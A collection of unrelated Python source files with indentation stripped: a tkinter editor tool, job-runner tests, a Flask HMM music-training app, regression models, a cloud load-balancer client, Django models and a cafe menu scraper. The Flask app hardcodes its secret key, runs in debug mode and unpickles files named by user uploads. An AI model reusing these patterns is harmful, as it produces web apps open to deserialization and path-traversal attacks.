text_widget.event_generate("<BackSpace>")
else: # dragging
if selecting:
text_widget.event_generate("<BackSpace>")
else:
text_widget.delete(tk.INSERT + '-1c')
elif self.tool_name == 'undo':
text_widget.edit_undo()
elif self.tool_name == 'redo':
text_widget.edit_redo()
elif self.tool_name == 'enter':
if not dragging:
if selecting :
text_widget.event_generate("<BackSpace>")
text_widget.event_generate("<Return>")
else : # not selecting
text_widget.event_generate("<Return>")
else: # dragging
if selecting:
text_widget.event_generate("<BackSpace>")
text_widget.event_generate("<Return>")
else:
text_widget.insert(tk.INSERT, '\n')
#stored_index = text_widget.index(tk.INSERT)
#text_widget.tag_remove(tk.SEL, '1.0')
#text_widget.mark_set(tk.INSERT, stored_index)
#text_widget.event_generate("<Return>")
elif self.tool_name == 'indent':
if not dragging:
text_widget.indent_region()
else: # dragging
if selecting:
text_widget.indent_region()
else:
text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
text_widget.indent_region()
elif self.tool_name == 'dedent':
if not dragging:
text_widget.dedent_region()
else: # dragging
if selecting:
text_widget.dedent_region()
else:
text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
text_widget.dedent_region()
def insert_into_shell(self, text_widget, selecting, dragging):
if text_widget.compare(tk.INSERT, '>=' , 'input_start'):
if self.tool_name == 'backspace' and text_widget.compare(tk.INSERT, '>' , 'input_start'):
# just bigger than, no equal than because of backspace del left char
if not dragging:
if selecting:
if text_widget.compare(tk.SEL_FIRST, '>=', 'input_start'):
text_widget.event_generate("<BackSpace>")
elif text_widget.compare(tk.SEL_LAST, '>', 'input_start'):
#print('so co')
text_widget.delete('input_start', tk.SEL_LAST)
text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
text_widget.mark_set(tk.INSERT, 'input_start')
else:
text_widget.event_generate("<BackSpace>")
else: # dragging
if selecting:
text_widget.event_generate("<BackSpace>")
else:
text_widget.delete(tk.INSERT + '-1c')
elif self.tool_name == 'undo':
if text_widget.compare('input_start', '==','end-1c'):
# empty line
text_widget.event_generate("<Up>")
else: # not empty line
text_widget.edit_undo()
elif self.tool_name == 'redo':
text_widget.edit_redo()
elif self.tool_name == 'enter':
if selecting:
text_widget.event_generate("<BackSpace>")
text_widget.event_generate("<Return>")
else:# not selecting
text_widget.event_generate("<Return>")
elif self.tool_name == 'indent':
pass # when in shell
elif self.tool_name == 'dedent':
pass # when in shell
else: # insert before input_start
if self.tool_name == 'enter':
text_widget.event_generate("<Return>")
elif self.tool_name == 'backspace':
# check if any selecting after input_start
if text_widget.compare(tk.SEL_LAST, '>', 'input_start'):
text_widget.delete('input_start', tk.SEL_LAST)
text_widget.tag_remove(tk.SEL, tk.SEL_FIRST, tk.SEL_LAST)
text_widget.mark_set(tk.INSERT, 'input_start')
elif self.tool_name == 'undo':
text_widget.event_generate('<Up>')
elif self.tool_name == 'redo':
text_widget.event_generate('<Down>')
class ToolPostit(ToolWidget,
ToolCodeMixin, BaseCode,
ToolPostMixin, BasePost,
BasePopup):
""" composite and mixin approach postit"""
def __init__(self, master, tool_name):
self.widget_init(master, tool_name)
self.code_init()
self.post_init()
#self.popup_init() |
<reponame>ni/hoplite
import time
from hoplite.builtin_plugins.constants import DOWNLOAD_NETWORK_FOLDER_JOB_NAME
from hoplite.utils import server_logging
from hoplite.server.jobs.job import Job, JobNotStartedError, NotAuthorizedError
from tests import HopliteTestCase
logger = server_logging.get_server_logger(__name__)
class TestJob(HopliteTestCase):
def setUp(self):
super(TestJob, self).setUp()
self.job = Job("{3939}", DOWNLOAD_NETWORK_FOLDER_JOB_NAME, { "path": "/path/to/something" }, "temp")
def test_initialize(self):
self.assertEquals(self.job.uuid, "{3939}")
self.assertEquals(self.job.name, DOWNLOAD_NETWORK_FOLDER_JOB_NAME)
self.assertEquals(self.job.config, { "path": "/path/to/something" })
self.assertEquals(self.job.running(), False)
def test_start(self):
self.job.start()
self.assertTrue(self.job.running())
self.job.kill()
def test_finished_throws_if_job_not_started(self):
with self.assertRaises(JobNotStartedError):
self.job.finished()
def test_finished(self):
job = Job("No ID", self.test_jobs_module.constants.THROW_AN_EXCEPTION_JOB_NAME, { "No": "Config" }, "some_complex_key")
job.start()
while job.running():
pass
self.assertTrue(job.finished())
def test_to_dict(self):
d = self.job.to_dict()
self.assertEquals(d["uuid"], "{3939}")
self.assertEquals(d["name"], DOWNLOAD_NETWORK_FOLDER_JOB_NAME)
self.assertEquals(d["config"], { "path": "/path/to/something" })
self.assertEquals(d["status"], {})
self.assertFalse(d["running"])
self.assertFalse(d["finished"])
def test_returns_exception_information_in_status(self):
config = {}
job = Job("666", self.test_jobs_module.constants.THROW_AN_EXCEPTION_JOB_NAME, config, "api_key", entry_point_group_name='hoplite.test_jobs')
job.start()
while job.running():
time.sleep(.01)
exc_info = job.status()["exception"]
traceback = None
# Get to the bottom level of the exception information
while ('type' not in exc_info) and (exc_info is not None):
traceback = exc_info.get("traceback", None)
exc_info = exc_info.get('previous_exception', None)
self.maxDiff = None
self.assertEqual(exc_info["type"], str(TypeError))
self.assertEqual(exc_info["message"], "THE SKY IS FALLING!!")
self.assertIsNotNone(traceback)
def test_returns_status(self):
self.assertEqual(self.job.status(), {})
def test_updates_status(self):
self.job.update_status(self.job._api_key, { "slave_ip": "10.2.13.123" })
status = self.job.status()
self.assertEquals(status, { "slave_ip": "10.2.13.123" })
# Make sure it overwrites old key values
self.job.update_status(self.job._api_key, { "slave_ip": "12.3.4.567" })
status = self.job.status()
self.assertEquals(status, { "slave_ip": "12.3.4.567" })
def test_update_status_raises_on_invalid_api_key(self):
self.assertRaises(NotAuthorizedError, self.job.update_status, "", {"Not": "Authorized"})
def test_kill(self):
job = Job("No ID", self.test_jobs_module.constants.WAIT_10_SECONDS_JOB_NAME, { "No": "Config" }, "temp_api_key")
logger.info("Starting job")
job.start()
self.assertTrue(job.running())
job.kill()
start_time = time.time()
while job.running():
if time.time() - start_time > 1:
raise Exception("Job not killed in time")
self.assertTrue(job.finished())
|
<filename>app.py
from flask import Flask, render_template, request, session
from flask_bootstrap import Bootstrap
import os
import numpy
import gui_logic as hmm
app = Flask(__name__)
bootstrap = Bootstrap(app)
app.secret_key = "secret"
@app.route('/', methods = ['GET'])
@app.route('/index', methods = ['GET'])
def index():
if request.method == "GET":
parameters = request.args
type = parameters.get('hmm_type')
train = parameters.get('train')
generate = parameters.get('generate')
session['type'] = type
if train == "train":
result = render_template("train_hmm.html", link = "/", type = type)
elif generate == "generate":
result = render_template("music_generator.html", link = "/", type = type)
else:
result = render_template("index.html")
return result
@app.route('/train_hmm')
def train_hmm():
return render_template("train_hmm.html", link = "/")
@app.route('/music_generator')
def music_generator():
return render_template("music_generator.html", link = "/")
@app.route('/sample', methods = ['POST'])
def sample():
image = None
midi = None
type = session['type']
framework = request.form.get('generator_framework')
if request.method == "POST":
model_name = request.files['model'].filename
if type == "hmm":
model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'hmm', model_name))
image, midi = hmm.generate_sample_hmm(model, model_name, framework)
else:
model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'fhmm', model_name))
image, midi = hmm.generate_sample_fhmm(model, model_name)
print(image,midi)
return render_template("music_generator.html", image = image, link = "/", midi = midi, type = type)
@app.route('/train', methods = ['POST'])
def training():
flag_test = False
if request.method == "POST":
parameters = request.form
type = session['type']
if type == "hmm":
framework = parameters.get("framework")
session['framework'] = framework
else:
M = int(parameters.get('m_value'))
size = parameters.get("size")
if size != "all":
size = int(parameters.get("size"))
iter = int(parameters.get("n_iter"))
K = int(parameters.get("n_components"))
if type == "hmm":
trainset, testset, vocabs = hmm.init(os.path.join(hmm.DATA_DIR, 'music21', 'bach_states_dataset.pkl'), size, type)
if framework == "hmml":
obs_train, train_lengths = hmm.prepare_dataset(trainset)
obs_vocab = [numpy.array([[i] for i, _ in enumerate(vocabs)]).reshape(-1, 1)]
numpy.random.shuffle(obs_vocab[0])
train_lengths.insert(0, len(vocabs))
obs_train = obs_vocab + obs_train
else:
obs_train = trainset
train_lengths = None
model, name = hmm.train_hmm(K, iter, len(vocabs), obs_train, train_lengths, size, framework)
else:
trainset, testset, vocabs = hmm.init(os.path.join(hmm.DATA_DIR, 'music21', 'bach_states_dataset.pkl'), size, type)
D = len(vocabs)
model, name = hmm.train_fhmm(D, M, K, iter, size, trainset)
session['model'] = name
session['size'] = size
if model is not None:
flag_test = True
return render_template("train_hmm.html", link="/", flag = True, flag_test = flag_test, type = type)
@app.route('/test', methods = ['POST'])
def testing():
model_name = session['model'] + '.pkl'
size = session['size']
type = session['type']
infs = means = result = ""
if type == "hmm":
framework = session['framework']
model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'hmm', model_name))
else:
model = hmm.load_pickle(os.path.join(hmm.MODELS_DIR, 'fhmm', model_name))
if request.method == "POST":
if request.files['testset'].filename != "":
pkl = request.files['testset']
testset = hmm.load_pickle(os.path.join(hmm.DATA_DIR, 'music21', pkl.filename))
else:
if type == "hmm":
dataset = hmm.load_pickle(os.path.join(hmm.DATA_DIR, 'music21', 'bach_states_dataset.pkl'))
testset = dataset[size:]
else:
dataset = hmm.load_pickle(os.path.join(hmm.DATA_DIR, 'music21', 'bach_states_dataset.pkl'))
testset = dataset[size:]
if type == "hmm":
if framework == "hmml":
obs_test, test_lengths = hmm.prepare_dataset(testset)
else:
obs_test = testset
infs, means = hmm.test_hmm(model, obs_test, framework)
else:
result = hmm.test_fhmm(model, testset)
return render_template("train_hmm.html", link="/", flag_test = True, infs = infs, means = means, result = result, type = type)
if __name__ == '__main__':
app.run(debug=True) |
<filename>simpleml/linear_regression.py<gh_stars>0
import numpy as np
from abc import ABC
class BaseModel(ABC):
"""
Abstract Model Class used as interface of all regression models.
:param model: Stored model data (NumPy array in most cases)
:type model: np.ndarray
:param data: input data for training or testing
:type data: np.ndarray
:param labels: labels of the input data for training
:type labels: np.ndarray
"""
def __init__(self):
self.model = None
def fit(self, data: np.ndarray, labels: np.ndarray):
"""
:param data: input data for training
:type data: np.ndarray
:param labels: labels of the input data for training
:type labels: np.ndarray
"""
pass
def predict(self, data: np.ndarray):
"""
:param data: input data for testing
:type data: np.ndarray
:return: predicted data
:rtype: np.ndarray
"""
pass
class ConstantModel(BaseModel):
"""
Constant model class that uses the average of each feature as prediction.
:param model: Stored model data (NumPy array in most cases)
:type model: np.ndarray
:param data: input data for training or testing
:type data: np.ndarray
:param labels: labels of the input data for training
:type labels: np.ndarray
"""
def fit(self, data: np.ndarray, labels: np.ndarray) -> None:
"""
Method for fitting the training data and determining and storing the model parameters. In this case
the model returns always the data average.
:param data: input data for training
:type data: np.ndarray
:param labels: labels of the input data for training
:type labels: np.ndarray
:return: None
"""
w = labels.mean()
self.model = w
def predict(self, data: np.ndarray) -> np.ndarray:
"""
Given the input data it returns the predicted output for each input point using the model, in this case
the average.
:param data: input data for testing
:type data: np.ndarray
:return: predicted data
:rtype: np.ndarray
"""
return np.ones(len(data)) * self.model
class LinearRegression(BaseModel):
"""
Linear regression model class that uses the following model for predictions:
.. math::
y = \\omega*X
"""
def fit(self, data: np.ndarray, labels: np.ndarray) -> None:
"""
Method for fitting the training data and determining and storing the model parameters :math:`\\omega`.
:param data: input data for training
:type data: np.ndarray
:param labels: labels of the input data for training
:type labels: np.ndarray
:return: None
"""
if len(data.shape) == 1:
w = data.T.dot(labels) / data.T.dot(data)
else:
w = np.linalg.inv(data.T.dot(data)).dot(data.T).dot(labels)
self.model = w
def predict(self, data: np.ndarray) -> np.ndarray:
"""
Given the input data it returns the predicted output for each input point using the model, in this case:
.. math::
y = \\omega*X
:param data: input data for testing
:type data: np.ndarray
:return: predicted data
:rtype: np.ndarray
"""
return self.model * data
class LinearRegressionWithB(BaseModel):
"""
Affine regression model class that uses the following model for predictions:
.. math::
y = \\omega*X + b
"""
def fit(self, data: np.ndarray, labels: np.ndarray) -> None:
"""
Method for fitting the training data and determining and storing the model parameters :math:`\\omega` and b.
:param data: input data for training
:type data: np.ndarray
:param labels: labels of the input data for training
:type labels: np.ndarray
:return: None
"""
x_expanded = np.vstack((data, np.ones(len(data)))).T
w = np.linalg.inv(x_expanded.T.dot(x_expanded)).dot(x_expanded.T).dot(labels)
self.model = w
def predict(self, data: np.ndarray) -> np.ndarray:
"""
Given the input data it returns the predicted output for each input point using the model, in this case:
.. math::
y = \\omega*X + b
:param data: input data for testing
:type data: np.ndarray
:return: predicted data
:rtype: np.ndarray
"""
x_expanded = np.vstack((data, np.ones(len(data)))).T
return x_expanded.dot(self.model)
|
from functools import partial
from operator import itemgetter
import attr
from characteristic import Attribute, attributes
from effect import catch, raise_
import six
from toolz.functoolz import identity
from toolz.itertoolz import concat
from otter.cloud_client import cloudfeeds as cf
from otter.cloud_client import (
log_success_response,
match_errors,
only_json_api_errors,
regex,
service_request)
from otter.constants import ServiceType
from otter.util.http import APIError, append_segments, try_json_with_keys
from otter.util.pure_http import has_code
# ----- CLB requests and error parsing -----
_CLB_IMMUTABLE_PATTERN = regex(
"Load\s*Balancer '\d+' has a status of '[^']+' and is considered "
"immutable")
_CLB_NOT_ACTIVE_PATTERN = regex("Load\s*Balancer is not ACTIVE")
_CLB_DELETED_PATTERN = regex(
"(Load\s*Balancer '\d+' has a status of 'PENDING_DELETE' and is|"
"The load balancer is deleted and) considered immutable")
_CLB_MARKED_DELETED_PATTERN = regex(
"The load\s*balancer is marked as deleted")
_CLB_NO_SUCH_NODE_PATTERN = regex(
"Node with id #\d+ not found for load\s*balancer #\d+$")
_CLB_NO_SUCH_LB_PATTERN = regex(
"Load\s*balancer not found")
_CLB_DUPLICATE_NODES_PATTERN = regex(
"Duplicate nodes detected. One or more nodes already configured "
"on load\s*balancer")
_CLB_NODE_LIMIT_PATTERN = regex(
"Nodes must not exceed (\d+) per load\s*balancer")
_CLB_NODE_REMOVED_PATTERN = regex(
"Node ids ((?:\d+,)*(?:\d+)) are not a part of your load\s*balancer")
_CLB_OVER_LIMIT_PATTERN = regex("OverLimit Retry\.{3}")
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBImmutableError(Exception):
"""
Error to be raised when the CLB is in some status that causes is to be
temporarily immutable.
This exception is _not_ used when the status is PENDING_DELETE. See
:obj:`CLBDeletedError`.
"""
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBNotFoundError(Exception):
"""A CLB doesn't exist. Superclass of other, more specific exceptions."""
class CLBDeletedError(CLBNotFoundError):
"""
Error to be raised when the CLB has been deleted or is being deleted.
This is distinct from it not existing.
"""
class NoSuchCLBError(CLBNotFoundError):
"""
Error to be raised when the CLB never existed in the first place (or it
has been deleted so long that there is no longer a record of it).
"""
@attributes([Attribute('lb_id', instance_of=six.text_type),
Attribute('node_id', instance_of=six.text_type)])
class NoSuchCLBNodeError(Exception):
"""
Error to be raised when attempting to modify a CLB node that no longer
exists.
"""
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBNotActiveError(Exception):
"""
Error to be raised when a CLB is not ACTIVE (and we have no more
information about what its actual state is).
"""
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBRateLimitError(Exception):
"""
Error to be raised when CLB returns 413 (rate limiting).
"""
@attributes([Attribute('lb_id', instance_of=six.text_type)])
class CLBDuplicateNodesError(Exception):
"""
Error to be raised only when adding one or more nodes to a CLB whose
address and port are mapped on the CLB.
"""
@attributes([Attribute('lb_id', instance_of=six.text_type),
Attribute("node_limit", instance_of=int)])
class CLBNodeLimitError(Exception):
"""
Error to be raised only when adding one or more nodes to a CLB: adding
that number of nodes would exceed the maximum number of nodes allowed on
the CLB.
"""
@attr.s
class CLBPartialNodesRemoved(Exception):
"""
Exception raised when only some of the nodes are removed.
:ivar lb_id: CLB ID
:type: :obj:`six.text_type`
:ivar list not_removed_node_ids: List of node_ids not removed where each
node_id is :obj:`six.text_type`
:ivar list removed_node_ids: List of node_ids removed where each node_id
is :obj:`six.text_type`
"""
lb_id = attr.ib(validator=attr.validators.instance_of(six.text_type))
not_removed_node_ids = attr.ib(validator=attr.validators.instance_of(list))
removed_node_ids = attr.ib(validator=attr.validators.instance_of(list))
def _expand_clb_matches(matches_tuples, lb_id, node_id=None):
"""
All CLB messages have only the keys ("message",), and the exception tpye
takes a load balancer ID and maybe a node ID. So expand a tuple that looks
like:
(code, pattern, exc_type)
to
(code, ("message",), pattern, partial(exc_type, lb_id=lb_id))
and maybe the partial will include the node ID too if it's provided.
"""
params = {"lb_id": six.text_type(lb_id)}
if node_id is not None:
params["node_id"] = six.text_type(node_id)
return [(m[0], ("message",), m[1], partial(m[2], **params))
for m in matches_tuples]
def _process_clb_api_error(api_error_code, json_body, lb_id):
"""
Attempt to parse generic CLB API error messages, and raise recognized
exceptions in their place.
:param int api_error_code: The status code from the HTTP request
:param dict json_body: The error message, parsed as a JSON dict.
:param string lb_id: The load balancer ID
:raises: :class:`CLBImmutableError`, :class:`CLBDeletedError`,
:class:`NoSuchCLBError`, :class:`APIError` by itself
"""
mappings = (
# overLimit is different than the other CLB messages because it's
# produced by repose
[(413, ("overLimit", "message"), _CLB_OVER_LIMIT_PATTERN,
partial(CLBRateLimitError, lb_id=six.text_type(lb_id)))] +
_expand_clb_matches(
[(422, _CLB_DELETED_PATTERN, CLBDeletedError),
(410, _CLB_MARKED_DELETED_PATTERN, CLBDeletedError),
(422, _CLB_IMMUTABLE_PATTERN, CLBImmutableError),
(422, _CLB_NOT_ACTIVE_PATTERN, CLBNotActiveError),
(404, _CLB_NO_SUCH_LB_PATTERN, NoSuchCLBError)],
lb_id))
return match_errors(mappings, api_error_code, json_body)
def add_clb_nodes(lb_id, nodes):
"""
Generate effect to add one or more nodes to a load balancer.
Note: This is not correctly documented in the load balancer documentation -
it is documented as "Add Node" (singular), but the examples show multiple
nodes being added.
:param str lb_id: The load balancer ID to add the nodes to
:param list nodes: A list of node dictionaries that each look like::
{
"address": "valid ip address",
"port": 80,
"condition": "ENABLED",
"weight": 1,
"type": "PRIMARY"
}
(weight and type are optional)
:return: :class:`ServiceRequest` effect
:raises: :class:`CLBImmutableError`, :class:`CLBDeletedError`,
:class:`NoSuchCLBError`, :class:`CLBDuplicateNodesError`,
:class:`APIError`
"""
eff = service_request(
ServiceType.CLOUD_LOAD_BALANCERS,
'POST',
append_segments('loadbalancers', lb_id, 'nodes'),
data={'nodes': nodes},
success_pred=has_code(202))
@only_json_api_errors
def _parse_known_errors(code, json_body):
mappings = _expand_clb_matches(
[(422, _CLB_DUPLICATE_NODES_PATTERN, CLBDuplicateNodesError)],
lb_id)
match_errors(mappings, code, json_body)
_process_clb_api_error(code, json_body, lb_id)
process_nodelimit_error(code, json_body, lb_id)
return eff.on(error=_parse_known_errors).on(
log_success_response('request-add-clb-nodes', identity))
def process_nodelimit_error(code, json_body, lb_id):
"""
Parse error that causes CLBNodeLimitError along with limit and raise it
"""
if code != 413:
return
match = _CLB_NODE_LIMIT_PATTERN.match(json_body.get("message", ""))
if match is not None:
limit = int(match.group(1))
raise CLBNodeLimitError(lb_id=six.text_type(lb_id), node_limit=limit)
def change_clb_node(lb_id, node_id, condition, weight, _type="PRIMARY"):
"""
Generate effect to change a node on a load balancer.
:param str lb_id: The load balancer ID to add the nodes to
:param str node_id: The node id to change.
:param str condition: The condition to change to: one of "ENABLED",
"DRAINING", or "DISABLED"
:param int weight: The weight to change to.
:param str _type: The type to change the CLB node to.
:return: :class:`ServiceRequest` effect
:raises: :class:`CLBImmutableError`, :class:`CLBDeletedError`,
:class:`NoSuchCLBError`, :class:`NoSuchCLBNodeError`, :class:`APIError`
"""
eff = service_request(
ServiceType.CLOUD_LOAD_BALANCERS,
'PUT',
append_segments('loadbalancers', lb_id, 'nodes', node_id),
data={'node': {
'condition': condition, 'weight': weight, 'type': _type}},
success_pred=has_code(202))
@only_json_api_errors
def _parse_known_errors(code, json_body):
_process_clb_api_error(code, json_body, lb_id)
match_errors(
_expand_clb_matches(
[(404, _CLB_NO_SUCH_NODE_PATTERN, NoSuchCLBNodeError)],
lb_id=lb_id, node_id=node_id),
code,
json_body)
return eff.on(error=_parse_known_errors)
# CLB 202 response here has no body, so no response logging needed
# Number of nodes that can be deleted in `DELETE ../nodes` call as per
# https://developer.rackspace.com/docs/cloud-load-balancers/v1/api-reference/nodes/#bulk-delete-nodes
CLB_BATCH_DELETE_LIMIT = 10
def remove_clb_nodes(lb_id, node_ids):
"""
Remove multiple nodes from a load balancer.
:param str lb_id: A load balancer ID.
:param node_ids: iterable of node IDs.
:return: Effect of None.
Succeeds on 202.
This function will handle the case where *some* of the nodes are valid and
some aren't, by retrying deleting only the valid ones.
"""
node_ids = list(node_ids)
partial = None
if len(node_ids) > CLB_BATCH_DELETE_LIMIT:
not_removing = node_ids[CLB_BATCH_DELETE_LIMIT:]
node_ids = node_ids[:CLB_BATCH_DELETE_LIMIT]
partial = CLBPartialNodesRemoved(six.text_type(lb_id),
map(six.text_type, not_removing),
map(six.text_type, node_ids))
eff = service_request(
ServiceType.CLOUD_LOAD_BALANCERS,
'DELETE',
append_segments('loadbalancers', lb_id, 'nodes'),
params={'id': map(str, node_ids)},
success_pred=has_code(202))
def check_invalid_nodes(exc_info):
code = exc_info[1].code
body = exc_info[1].body
if code == 400:
message = try_json_with_keys(
body, ["validationErrors", "messages", 0])
if message is not None:
match = _CLB_NODE_REMOVED_PATTERN.match(message)
if match:
removed = concat([group.split(',')
for group in match.groups()])
return remove_clb_nodes(lb_id,
set(node_ids) - set(removed))
six.reraise(*exc_info)
return eff.on(
error=catch(APIError, check_invalid_nodes)
).on(
error=only_json_api_errors(
lambda c, b: _process_clb_api_error(c, b, lb_id))
).on(success=lambda _: None if partial is None else raise_(partial))
# CLB 202 responses here has no body, so no response logging needed.
def get_clb_nodes(lb_id):
"""
Fetch the nodes of the given load balancer. Returns list of node JSON.
"""
return service_request(
ServiceType.CLOUD_LOAD_BALANCERS,
'GET',
append_segments('loadbalancers', str(lb_id), 'nodes'),
).on(
error=only_json_api_errors(
lambda c, b: _process_clb_api_error(c, b, lb_id))
).on(
log_success_response('request-list-clb-nodes', identity)
).on(
success=lambda (response, body): body['nodes'])
def get_clbs():
"""Fetch all LBs for a tenant. Returns list of loadbalancer JSON."""
return service_request(
ServiceType.CLOUD_LOAD_BALANCERS, 'GET', 'loadbalancers',
).on(
log_success_response('request-list-clbs', identity)
).on(
success=lambda (response, body): body['loadBalancers'])
def get_clb_node_feed(lb_id, node_id):
"""
Get the atom feed associated with a CLB node.
:param int lb_id: Cloud Load balancer ID
:param int node_id: Node ID of in loadbalancer node
:returns: Effect of ``list`` of atom entry :class:`Element`
:rtype: ``Effect``
"""
return cf.read_entries(
ServiceType.CLOUD_LOAD_BALANCERS,
append_segments('loadbalancers', str(lb_id), 'nodes',
'{}.atom'.format(node_id)),
{},
cf.Direction.NEXT,
"request-get-clb-node-feed"
).on(itemgetter(0)).on(
error=only_json_api_errors(
lambda c, b: _process_clb_api_error(c, b, lb_id))
)
def get_clb_health_monitor(lb_id):
"""
Return CLB health monitor setting
:param int lb_id: Loadbalancer ID
:return: ``Effect`` of ``dict`` representing health monitor config
"""
return service_request(
ServiceType.CLOUD_LOAD_BALANCERS,
'GET',
append_segments('loadbalancers', str(lb_id), 'healthmonitor')
).on(
error=only_json_api_errors(
lambda c, b: _process_clb_api_error(c, b, lb_id))
).on(
log_success_response('request-get-clb-healthmon', identity)
).on(
success=lambda (response, body): body["healthMonitor"])
|
<gh_stars>0
try:
from collections import OrderedDict
except ImportError:
from django.utils.datastructures import SortedDict as OrderedDict
from django.db import models
from django.db.models.fields import BLANK_CHOICE_DASH
from django.utils.encoding import python_2_unicode_compatible
from django.utils.functional import lazy
from django.utils.translation import ugettext_lazy as _
from . import settings, utils
try:
from django.utils.text import slugify
except ImportError: # pragma: no cover, Django 1.4
from django.template.defaultfilters import slugify
@python_2_unicode_compatible
class Item(models.Model):
title = models.CharField(_('title'), max_length=100)
short_description = models.TextField(
_('short description'), blank=True, null=True)
image = models.ForeignKey('media.Image', blank=True, null=True)
url = models.URLField(blank=True, null=True)
price = models.CharField(_('price'), blank=True, null=True, max_length=100)
sold = models.BooleanField(_('sold'), default=False)
featured = models.BooleanField(_('featured'), default=False)
@property
def get_attributes(self):
return self.attributes.order_by('attribute__ordering')
class Meta:
verbose_name = _('item')
verbose_name_plural = _('items')
def __str__(self):
return self.title
FIELD_TYPES = utils.get_object(settings.LEONARDO_ITEMS_FIELD_TYPES)
def get_type_choices():
return [r[:2] for r in
utils.get_object(settings.LEONARDO_ITEMS_FIELD_TYPES)]
@python_2_unicode_compatible
class Attribute(models.Model):
ordering = models.IntegerField(_('ordering'), default=0)
title = models.CharField(_('title'), max_length=100)
name = models.CharField(_('name'), max_length=100)
type = models.CharField(
_('type'), max_length=20, choices=lazy(get_type_choices, list)())
choices = models.CharField(
_('choices'), max_length=1024, blank=True,
help_text=_('Comma-separated'))
help_text = models.CharField(
_('help text'), max_length=1024, blank=True,
help_text=_('Optional extra explanatory text beside the field'))
default_value = models.CharField(
_('default value'), max_length=255, blank=True,
help_text=_('Optional default value of the field'))
class Meta:
ordering = ['ordering', 'id']
verbose_name = _('item attribute')
verbose_name_plural = _('item attributes')
def __str__(self):
return self.title
def get_choices(self):
get_tuple = lambda value: (slugify(value.strip()), value.strip())
choices = [get_tuple(value) for value in self.choices.split(',')]
if not self.is_required and self.type == 'select':
choices = BLANK_CHOICE_DASH + choices
return tuple(choices)
def get_type(self, **kwargs):
types = dict((r[0], r[2]) for r in FIELD_TYPES)
return types[self.type](**kwargs)
def add_formfield(self, fields, form):
fields[slugify(self.name)] = self.formfield()
def formfield(self):
kwargs = dict(
label=self.title,
required=self.is_required,
initial=self.default_value,
)
if self.choices:
kwargs['choices'] = self.get_choices()
if self.help_text:
kwargs['help_text'] = self.help_text
return self.get_type(**kwargs)
class AttributeValue(models.Model):
item = models.ForeignKey(
Item, related_name='attributes', verbose_name=_('item'))
attribute = models.ForeignKey(
Attribute, related_name='values', verbose_name=_('item'))
value = models.CharField(
_('value'), max_length=255, blank=True,
help_text=_('value of the field'))
class Meta:
unique_together = (('item', 'attribute'),)
verbose_name = _('attribute value')
verbose_name_plural = _('attribute value')
|
#!/usr/bin/env python
# coding: utf-8
#
# Copyright (c) 2015, PAL Team.
# All rights reserved. See LICENSE for details.
#
# An API to the Bon Appetit food service data
#
# Author: <NAME> and <NAME>
# TODO:
# - Add support for caching data with pickle
# - Decide on a naming scheme for cached data
# - Implement a way to clear the cache as it becomes irrelevant
# - Add a CI job to cache data every morning/evening
import json
import re
import requests
from api import DataNotAvailableException
from utils import filter_dict_by_keys
# Constants for scraping the cafe pages
CAFE_NAMES = ['burton', 'east-hall', 'sayles-hill-cafe', 'weitz-cafe']
_CAFE_URL = 'http://carleton.cafebonappetit.com/cafe/{cafe_name}/{date}/'
_RE_NAME = r'Bamco.current_cafe\s+=\s+(?:[^;]+)name:\s+\'(.*?)\'(?:[^;]+);'
_RE_MENU = r'Bamco.menu_items\s+=\s+([^;]+);'
_RE_DAYPARTS = r'Bamco.dayparts\[\'(\d+)\'\]\s+=\s+([^;]+);'
# Constants for parsing Bamco.menu_items
_BASE_FIELDS = [u'id', u'label']
_MENU_FIELDS = _BASE_FIELDS + [u'description', u'cor_icon']
_MENU_REPLACEMENTS = (
(re.compile(r' (\([^G]?G?\))'), ""),
(re.compile(r'\s+'), " ")
)
_MEAL_FIELDS = _BASE_FIELDS + [u'stations', u'time_formatted']
_MEAL_STATION_FIELDS = _BASE_FIELDS + [u'items']
def _get_page_for_cafe(cafe_name, date_):
""" Returns the HTML page for the given cafe and date."""
url = _CAFE_URL.format(cafe_name=cafe_name, date=date_.isoformat())
response = requests.get(url, timeout=5.0)
return response.text
def _get_raw_data_from_page(page):
""" Scrapes the name, menu, and dayparts from the given page."""
name_matches = re.findall(_RE_NAME, page)
name = name_matches[0] if name_matches else None
menu_matches = re.findall(_RE_MENU, page)
dishes = json.loads(menu_matches[0]) if menu_matches else None
dayparts = {}
dayparts_matches = re.findall(_RE_DAYPARTS, page)
if dayparts_matches:
for match in dayparts_matches:
part_num, dict_ = match
dayparts[int(part_num)] = json.loads(dict_)
else:
dayparts = None
return name, dishes, dayparts
def _get_raw_data_for_cafe(cafe_name, day):
""" Returns the name, menu, and dayparts for the given cafe and date."""
page = _get_page_for_cafe(cafe_name, day)
return _get_raw_data_from_page(page)
def _clean_menu(menu):
""" Returns a cleaned version of the given menu info for dishes."""
if not menu:
return None
for food_id in menu:
info = filter_dict_by_keys(menu[food_id], _MENU_FIELDS)
for regex, new in _MENU_REPLACEMENTS:
info[u'description'] = regex.sub(new, info[u'description'])
info[u'label'] = regex.sub(new, info[u'label'])
menu[food_id] = info
return menu
def _clean_meals_and_merge_dishes(dayparts, dishes):
""" Takes in the cleaned menu and messy dayparts, cleans the dayparts then
merges the dishes into the right stations in the meals.
"""
if not dayparts:
return dayparts
dayparts = _use_labels_as_keys(dayparts)
for meal_name in dayparts:
info = filter_dict_by_keys(dayparts[meal_name], _MEAL_FIELDS)
meal_stations = _use_labels_as_keys(info[u'stations'])
for stat_name in meal_stations:
stat_info = filter_dict_by_keys(meal_stations[stat_name],
_MEAL_STATION_FIELDS)
if u'items' in stat_info:
# Put all the dishes served at this station into the dict
items = stat_info[u'items']
stat_info[u'items'] = [dishes[eid]
for eid in items
if type(eid) == unicode]
meal_stations[stat_name] = stat_info
info[u'stations'] = meal_stations
dayparts[meal_name] = info
return dayparts
def get_meals_for_cafe(cafe_name, date_):
""" Returns a cleaned version of the meals info for
the given cafe and date.
"""
page = _get_page_for_cafe(cafe_name, date_)
_, menu, dayparts = _get_raw_data_from_page(page)
